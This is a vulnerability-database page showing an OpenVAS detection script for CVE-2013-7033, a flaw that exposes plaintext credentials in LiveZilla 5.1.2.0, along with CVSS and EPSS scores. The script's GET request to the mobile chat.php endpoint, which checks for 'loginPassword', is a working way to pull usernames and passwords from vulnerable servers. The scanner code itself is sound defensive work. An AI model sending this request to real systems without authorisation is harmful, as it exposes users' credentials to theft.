Lucene search

K
openvasCopyright (C) 2014 Greenbone AGOPENVAS:1361412562310804403
HistoryFeb 19, 2014 - 12:00 a.m.

LiveZilla Password Disclosure Vulnerability

2014-02-1900:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
14

6.5 Medium

AI Score

Confidence

Low

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

0.003 Low

EPSS

Percentile

69.2%

LiveZilla is prone to password disclosure vulnerability.

# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:livezilla:livezilla";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.804403");
  script_version("2023-07-26T05:05:09+0000");
  script_cve_id("CVE-2013-7033");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:N/A:N");
  script_tag(name:"last_modification", value:"2023-07-26 05:05:09 +0000 (Wed, 26 Jul 2023)");
  script_tag(name:"creation_date", value:"2014-02-19 15:34:01 +0530 (Wed, 19 Feb 2014)");
  script_name("LiveZilla Password Disclosure Vulnerability");

  script_tag(name:"summary", value:"LiveZilla is prone to password disclosure vulnerability.");
  script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request and check whether it is able
  read the password or not.");
  script_tag(name:"insight", value:"LiveZilla contains a flaw that is due to the application storing credential
  information in plaintext. This will allow an attacker to gain access to
  username and password information.");
  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to obtain sensitive
  information from the application, such as logged-in user credentials,
  which may aid in further attacks.");
  script_tag(name:"affected", value:"LiveZilla version 5.1.2.0");
  script_tag(name:"solution", value:"Upgrade to LiveZilla 5.1.2.1 or later.");

  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Dec/74");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/64378");
  script_xref(name:"URL", value:"http://packetstormsecurity.com/files/124444");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_livezilla_detect.nasl");
  script_mandatory_keys("LiveZilla/installed");
  script_require_ports("Services/www", 80);

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"qod_type", value:"remote_app");

  script_xref(name:"URL", value:"http://livezilla.net");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if(!lzPort = get_app_port(cpe:CPE)){
#  exit(0);
}

if(!dir = get_app_location(cpe:CPE, port:lzPort)){
  exit(0);
}

if( dir == "/" ) dir = "";

url = dir + "/mobile/chat.php?acid=d412e";

if(http_vuln_check(port:lzPort, url: url, check_header: TRUE,
   pattern: "loginPassword = '",
   extra_check: make_list("loginName = '", "Livezilla Mobile")))
{
  security_message(port:lzPort);
  exit(0);
}

exit(99);

6.5 Medium

AI Score

Confidence

Low

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

0.003 Low

EPSS

Percentile

69.2%

Related for OPENVAS:1361412562310804403